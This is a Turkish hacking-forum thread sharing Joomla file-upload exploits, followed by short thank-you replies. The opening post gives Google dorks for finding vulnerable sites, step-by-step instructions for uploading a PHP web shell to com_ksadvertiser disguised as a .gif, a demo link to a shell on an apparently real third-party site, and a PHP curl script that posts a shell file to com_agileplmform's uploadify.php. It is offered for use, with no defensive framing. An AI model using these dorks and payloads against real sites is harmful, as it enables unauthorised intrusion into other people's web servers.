Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: 2012- 2013 Joomla Upload Açıkları
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
2012- 2013 Joomla Upload Açıkları
25.12.2013 20:13
2013 - 2012 'in En çok kullanılan Joomla Upload Açıkları

[color=#006400]Joomla Component com_ksadvertiser Remote File & Bypass Upload Vulnerability


Kod:
----------------------------------------------------
Google Dork: inurl:index.php?option=com_ksadvertiser
-----------------------------------------------------
1.  Some pages require the Register
Registrese Algunas Paginas lo exigen
-----------------------------------------------
http://site/index.php?option=com_user&view=login

-----------------------------------------------
2.  Go to the upload path
Dirijase a la ruta del upload

-----------------------------------------------------------------------------------
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
------------------------------------------------------------------------------------
3.  Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif
Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif

4.  Locate your file in the root / images/ksadvertiser/U0 -> this may vary
Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar
---------------------------------------------
http://site/images/ksadvertiser/U0/403.php.gif

----------------------------------------------
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
------------------------------------------------------------------


Joomla Component com_agileplmform file upload vulnerability


Kod:
---------------------------------------------
Google Dork: inurl:components/com_agileplmform
----------------------------------------------
<?php
/* example of using
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="C:\AppServ\www\b.php";
$ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_agileplmform/views/agileplmform/js/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

[+] how TO use
Tunisia.php must be the devil file 3:)
!!!shell!!!
--------------------------------------------------------------------------------
TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/
Filename : $postResult output


Alinti
Mentalistler
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 25
Yaşam Puanı: 267 / 608
Deneyim: 35 / 100
Rep Sayısı: 190
Mesaj Sayısı: 792
Üyelik Tarihi: 02.10.2013
     
Yorum: #2
Cvp: 2012- 2013 Joomla Upload Açıkları
25.12.2013 23:42
teşekürler abim Smile
Alinti
ReeD
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 0 / 8
Deneyim: 34 / 100
Rep Sayısı: 0
Mesaj Sayısı: 5
Üyelik Tarihi: 26.12.2013
     
Yorum: #3
Cvp: 2012- 2013 Joomla Upload Açıkları
26.12.2013 04:08
Teşekkürler
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,048 / 1,048
Deneyim: 95 / 100
Rep Sayısı: 1020
Mesaj Sayısı: 2983
Üyelik Tarihi: 04.05.2013
      
Yorum: #4
Cvp: 2012- 2013 Joomla Upload Açıkları
26.12.2013 17:14
eline sağlık ;)

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Hacker Peyami
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 27
Yaşam Puanı: 332 / 664
Deneyim: 56 / 100
Rep Sayısı: 61
Mesaj Sayısı: 963
Üyelik Tarihi: 18.06.2013
      
Yorum: #5
Cvp: 2012- 2013 Joomla Upload Açıkları
26.12.2013 17:20
eline sağlık abim Smile
Alinti



1 Ziyaretçi
[-]
Sponsor Reklam